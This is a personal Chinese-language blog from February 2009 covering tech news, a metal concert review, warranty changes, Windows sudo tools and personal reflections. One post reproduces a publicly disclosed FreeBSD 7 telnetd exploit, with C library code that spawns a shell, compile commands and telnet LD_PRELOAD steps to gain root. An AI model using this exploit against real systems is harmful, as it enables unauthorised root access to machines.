2009/02/27

Google Apps Status Dashboard

http://www.google.com/appsstatus

有戒於前幾天 Gmail 大爆炸,Google Release 了 Apps Status Dashboard。
比 Windows Live Messenger 的服務狀態感覺有誠意多了,不是嗎?XD

20090227_203140 - 'Apps Status Dashboard' - www_google_com_appsstatus#

貓咪的滑行特訓

真的是太可愛了啊....
雙腳開開的在地板上衝刺滑行 XD

對於沒時間+考試的輪迴感到厭倦

一切就隨意了吧
我只想做我想做的事情而已啊

不斷的這樣輪迴下來只是自殘而已
我可不想讓我快老化的身軀跟心加速老化

2009/02/26

Flash Player 10.0.22.87 安全性更新

Flash Player update available to address security vulnerabilities
http://www.adobe.com/support/security/bulletins/apsb09-01.html

A potential vulnerability has been identified in Adobe Flash Player 10.0.12.36 and earlier that could allow an attacker who successfully exploits this potential vulnerability to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit this potential vulnerability. Additional vulnerabilities have been addressed in this update. Adobe recommends users update to the most current version of Flash Player available for their platform.

檢查本機安裝的 Flash Player 版本
http://www.adobe.com/products/flash/about/

Adobe 強烈建議安裝此更新以避免安全性攻擊。

2009/02/24

SSH 亂碼小記

之前一直有人詢問 SSH 在 cat binary 或者其他字符出現亂碼無法恢復的情況該如何解決,一般很多人都是直接斷線重連,但是其實只要使用幾個指令就可以恢復畫面。

tput sgr0

或者

echo -e '\xf'

亂碼產生的原因應該是因為 '\xe' 字元在解析時出問題。

網駭科技資安部落格開張!

http://blog.net-hack.com/

今天在新系統上掃描有些成果,想說貼到 Blog 上發表一下好了。
結果想了想,為什麼不弄一個自己公司的 Blog 呢?
然後今天馬上就生出來了。XD

一些 Blog 細微的部份還需要調整,先記錄一下,賀開站。:D

2009/02/23

Symphony X Concerts 台北演唱會

這次有記得帶票了!XD
想到上次跟念德去聽 Dream Theater 的時候興沖沖結果沒帶票,整個超囧。XDDDD

一開始想說要去享受一下,17:30 就殺到劍潭青年活動中心,拿到號碼牌 026。
然後等到 18:30 就聽到廣播說入場改到 20:00....
算了,意料中的事情。
走去附近逛逛買點小東西吃,再回來慢慢等。

後來終於等到進場了,還好 026 還滿前面的,
再繼續等了半小時後終於進場了。
結果站到第三排!搖滾區根本跟 VIP 位置沒差!

暖場團 Eternal 一進來,就聽到音場轟轟轟轟轟...
主唱的聲音完全聽不到,我只聽得到鼓聲跟轟轟轟轟轟轟轟轟轟...
後來主唱很貼心的說只唱兩首,讓大家趕快聽 Symphony X。
請大家不要上 Ptt 罵他們。XDDD
太可愛了!

後來等等等等等等,終於 Symphony X 上台了。
一聽就覺得真的很慘,低音把其他全部吃光了啦...
都快變夜店了 Orz...
主唱聲音也有種在 ktv 唱歌的感覺...QQ

感覺應該是大鼓的轟轟轟加上 Bass 的聲音加上迴音把其他聲音吃光光...
然後後面又有一個瘋子亂吼亂跟著唱,但是大聲難聽又破音...
台上的聲音都聽不到了,你在那邊吼是吼三小。
差點想拿雨傘往牠鼻孔戳下去。

後來看到場地中間還滿空的,我就慢慢退退到中間去。
結果聲音也沒好到哪去,只清楚一點點。
終於聽得到主唱一點點的聲音了這樣...

我一直走到 PA 區前方聲音都還是糊到不行,
真的想問他們到底是在調啥小,真的有在工作嗎?
我整場真的是有聽到完整的鼓聲,其他都是轟轟轟轟轟轟轟轟跟尖叫和白痴的破音合唱。

很多時候主唱希望大家要一起唱的時候,結果其實還滿多人不知道歌詞的。
結果主唱好幾次摸摸鼻子這樣。XD
而且他在台上講話的時候感覺沒人聽得懂很哀傷。XD
後來終於有人聽懂了,他顯得相當欣慰。XD
然後在台上一直跟大家握手感覺相當親切!

曲目大致上跟網路上流傳的一樣,但是只能從鼓聲來辨別是什麼歌。相當哀傷。
真的是有對他們有愛才能聽得下去...
全部在腦內補完這樣。orz

喔還有附帶一提,
正妹好多喔。怎麼會這樣。而且很多都是一個人而已...
我原本以為只有一群大叔跟妖魔鬼怪的...
岳廷你應該跟我來的。

還好這次沒有帶別人去見識金屬 Live,不然大概又是毀了。Orz
真的是鳥翻天了...

喔喔這次依舊有看到認識的人,輔大以前搖研社的雙踏王!
不過不知道他有沒有認出我。XD

Set list

Prelude - Oculus ex Inferni
Set the World on Fire
Domination
Serpents Kiss
Masquerade
Paradise Lost
Inferno
Evolution
Smoke and Mirrors
Revelation

Encore:
Eve of Seduction
Sins and Shadows
Sea of Lies

2009/02/18

以前的我都只會看著地面上自己的腳步

現在的我,隨時可以看著天空。

儘管時而混濁,時而晴朗,

但是我可以看著它,深吸著屬於我的空氣。

2009/02/17

Gmail Manager 更新,解決 Gmail Offline 問題。

Gmail Manager 0.5.7.1
https://addons.mozilla.org/zh-TW/firefox/addon/1320

Gmail Manager 0.5.7.1 Discussion
http://forums.mozillazine.org/viewtopic.php?t=332634

What's new in 0.5.7.1 released 2/15/2009
- Fixed Gmail login redirect loop
自從用了 Gmail Offline 之後 Gmail Manager 就一直不正常。

而且還會有 redirect loop 的情況發生。

現在終於更新解決啦!

沒有這個套件還真不知道怎麼管理十多個 Gmail 帳號...Orz

羅技 Logitech 更改保固方式

新聞稿
http://www.logitech.com/index.cfm/172/5552
羅技電子全新產品售後服務將於2009年2月16日正式啟動,以最專業、最貼心、最高品質的服務提供予廣大消費者。位於台北的客服中心及中南部收件窗口也將於2009年4月1日起不再接受現場更換產品服務及寄件更換服務。

保固條款
http://www.logitech.com/index.cfm/447/5533
羅技電子秉持對品牌的承諾與顧客至上的原則,於2009年2月16日正式啟動全新型態的產品售後服務,讓消費者既省荷包,又可擁有更便利的產品送修方式。

消費者只需持購買證明及整組產品至原購買的經銷商(原購買店家、門市),即可獲得產品更換服務。

羅技電子全新產品售後服務將於2009年2月16日正式啟動,以最專業、最貼心、最高品質的服務提供予廣大消費者。位於台北的客服中心及中南部收件窗口也將於2009年4月1日起不再接受現場更換產品服務及寄件更換服務。


這樣以往羅技最令人激賞的保固維修方式就不存在了。
原先只要 email 或電話通知,然後將產品寄回就可以進行維修或換貨。
現在需要持購買證明到原購買店家才行,
但是一堆店家根本沒有所謂的購買證明...
未來會怎麼運作頗令人擔憂。

另外對於保固的資格也比原本嚴格,
例如「操作不當」這一項,我想很多產品就不能送修了吧。
保固貼紙跟標示磨損或模糊是一定會發生的,
滑鼠背面這麼容易刮傷,這樣也不保固我想有點糟糕。

不過這些我想應該都還算是在合情合理的範圍,
只是我想很多為了良好保固而購買羅技的人應該都會卻步了吧。

好在上個月才剛送修 Logitech G3,換了個新品回來。Orz

2009/02/15

Sudo for Vista

因為目前一些特殊需求,需要在 Vista 上類似 UNIX 的 sudo 功能。 (Windows XP 上需要 suDown :P)
使用 sudo 執行的 command,會以管理者的身分去執行。

找了一下相關的資訊,其實自己寫一個簡單的程式去讀取 command 是沒問題的。
列出目前用過沒問題的:

Sudo for Vista
http://techblogging.wordpress.com/2007/11/28/sudo-for-vista/
1: require 'Win32API'
2:
3: def shell_execute(process_name)
4: process = ''
5: process.replace(process_name)
6: se = Win32API.new("shell32", "ShellExecute", ['P','P','P','P','P','I'], 'I')
7: se.Call(nil,"runas",process,nil,nil,5)
8: end
9:
10: shell_execute(ARGV[0])

一個簡單的 Ruby 小程式,還滿推薦使用的。

Start++ for Windows Vista
http://brandontools.com/content/StartPlusPlus.aspx
功能很強大的 Start++,除了 sudo 功能之外,還有 Web search 等附加功能。
可以直接在開始功能表裡面打入關鍵字來執行功能。
算是整合型的好用工具。

假如只是想要最基本的 sudo 功能,又有安裝 Ruby 的話,推薦使用上面的小程式。
假如想要強大新奇的功能,可以嘗試看看 Start++。

FreeBSD 7 telnet daemon local privilege escalation

http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/67203

為什麼這年頭還會出現 telnetd 0-day 啊...
超無言的 Orz



# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
FILE *f;
setenv("LD_PRELOAD", "", 1);
system("echo ALEX-ALEX;/bin/sh");
}
---snip-----

Then we compile this stuff.

---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o
-nostartfiles
---snip-----

Then we copy the file to a known location (local root exploit)

---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----

...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.

---snip-----
#telnet
/>auth disable SRA
/>environ define LD_PRELOAD /tmp/libno_ex.so.1.0
/>open target
---snip-----
ALEX-ALEX
#ROOTSHELL

Palm 宣布不再開發 Palm OS 機種。

http://www.precentral.net/palm-ceo-ed-colligan-talks-pre-investors

There will be no more PalmOS devices released by Palm (excepting the Centro getting released on other carriers). They're focused on webOS and Windows Mobile.

這其實是可以預見的。
希望 webOS 真的能夠再創 Palm 的奇蹟。

手上還有八台 PalmOS 的機子,從 PalmPilot、Palm m500、m505、Sony Clie SL-10、Fossil Abacus WristPDA Watch、Sony Clie TH55 到 Palm Treo 650...

現在想想 PalmOS 上一堆好用到超乎想像的程式,
最後在未來只能緬懷,不經有點哀傷啊...
希望 Palm webOS 可以再創榮景啊。
雖然我覺得原本 PalmOS 上一堆系統 Hack 至今應該不可能在任何其他系統上實現了...:(

2009/02/14

UNIX Time 1234567890 / 情人節快樂!

UNIX Time 1234567890 倒數:
http://www.1234567890day.com/
http://coolepochcountdown.com/

UNIX Time 是從 1970-01-01 0:0:0 開始計算至今的秒數。
而台灣時間 Sat Feb 14 07:31:30 CST 2009 正好是 1234567890!
在國外開 Party 慶祝的同時,我想在台灣早上七點半應該還是呼呼大睡的時候?XD

就用情人節來慶祝吧,情人節快樂!:D

2009/02/11

Burn Rate 真的是太優秀了

介紹文請看 Xdite 的 Blog
http://blog.xdite.net/?p=894

這幾天兩位同事一起團購買了 Burn Rate,也在公司熱鬧了幾天。
剛開始覺得還滿複雜的,但是其實玩過一輪之後大概就上手了。
但這殘酷的遊戲整個是把創業夢澆熄了啊啊啊啊啊啊啊~!

不過真正好玩的地方是,這遊戲真的是相當寫實。
把業界一些真實的公司、英雄人物套進去相當符合。XD

「歐你不要又把 Mr. # 丟到我們公司啊啊啊!這樣通通不 work 通通都不能結案會倒閉的啊啊啊!」
整個是歡樂到爆炸。XD

相當推薦同是資訊業界的人一起玩玩。XD

皮膚痊癒!

真的是太唬爛了。XD

之前去正康藥局買個藥想說應急,然後給老闆看了一下皮膚,老闆就推薦了個藥膏。
沒有類固醇,然後想說可能會擦整個背部所以買一大條 $375。
然後藥劑師說不要擦乳液,說身體沒事擦什麼乳液。XD

結果擦兩天幾乎好了 90%。Orz
那之前那些皮膚科是在衝啥 XD
擦了一堆藥吃了一堆藥還要複診好幾次這樣...
想賺一次跟想賺好幾次的差別這樣嗎?XD

睡一覺起來皮膚全好真的讓我以為吃了仙豆.....囧
那我去年一整年這樣皮膚爛掉是爛心酸的嗎?.....
害我損失很多寶貴的東西啊......

現在可以做好多好多事情了 :~
運動、泡溫泉、什麼都可以了 :~

唉我過去可憐的一年啊..........
因為過敏什麼事情都不能做,然後心情超差超負面......
真的是像個白痴一樣。

2009/02/07

不知不覺,我好像也成熟了一點呢。

雖然是「自以為」的成熟一點。
相較以前的我來比。

很多事情以前覺得很重要的,覺得不能讓步的,
現在覺得有什麼意義嗎?XD

就好像:
你點開了小遊戲,但是你想了一想,玩到最後自己得到了什麼?就不想玩了。
你想買一個東西,但是你想了一想,買了之後到底有沒有用呢?就不想買了。
有什麼意義嗎?

但是這跟我的熱血是相牴觸的啊...

2009/02/06

Seven Pound 七生有幸



76 分。
這中文片名翻得真的是還不錯,還好不是翻七磅還是救人七命之類的...
但是我沒有辦法給這片太高的評價。@_@

劇情的主軸是在贖罪,但是鋪陳的相當長。
導演刻意隱瞞這個劇情主軸當做一個「秘密」,但是觀眾在不理解的情況下慢慢從劇情推敲到底發生了什麼事情。立意雖然不錯,但是時間過長,甚至要到劇情中後段你才會真正的去理解到底發生什麼事情了。也看到不少人不耐煩,搔頭苦思到底真正的祕密是什麼。

釐清之後,其實劇情還是有些許單薄,而且是不值得鼓勵的走向。XD
因為之前自己毀了七個人的人生,犧牲自己去補償七個陌生人。
原先以為他會因為這七個人而重新找回生存的意義,但是沒想到最後還是一直強迫自己去回想最痛苦的回憶讓自己犧牲。

講講優點,Will Smith 的悲情苦瓜臉真的是很融入劇情。
很多時候你真的能夠去體會到他想尋死的念頭。

後面決定尋死的時候,告訴他的朋友「It's time. I love you.」,看著兩個人哭泣的臉真的是很讓人動容。

推薦心情太好的人去看。XD

搜尋引擎找不到的威秀影城官方網站

http://www.vscinemas.com.tw/

今天要訂票的時候,習慣性的搜尋一下網站,發現依舊是找不到。
Google、Yahoo都搜尋不到,不管是用威秀影城、威秀、華納威秀、"威秀影城 官方網站"還是什麼都一樣。
但是直接打 site:http://www.vscinemas.com.tw/ 卻有東西。
真的是很詭異。

神祕的 Live Search 則是第一筆就找到了。XD

記錄一下。

Keyword: 威秀影城 / 威秀 / 華納威秀 / 威秀影城官方網站 / vscinemas / 信義威秀

最近真的是燃燒生命在寫 code

真的是很熱血!

現在想想,前一位把 code 搞得那麼醜陋或許有兩個原因:(詳見這篇)
1. 只有一個人開發
2. 只想要一個人開發,即使到未來 XD

之前看過一些文章,要怎麼樣確保你未來的工作?
就是把 code 寫得別人看不懂,或者是用一些極少人會用的冷門東西。XD
更差勁的是把註解寫得搞得別人更搞不懂。

不過,台灣這個圈子就已經那麼小了。
宏觀來看,在世界上已經基本上沒什麼競爭力了。
還要搞這些降低生產力 1000% 的手法,就真的是太虧了。
我自己寫的 Code 通常變數名稱、註解、Changelog 都會相當詳細。
根據自己龜毛又完美主義的爛個性,又是一定會測試很多遍。
後面的人要接手除非他真的是什麼都不會,不然應該很好上手。

話說回來,當然我相信前一位開發者一定是第一個原因啦。:$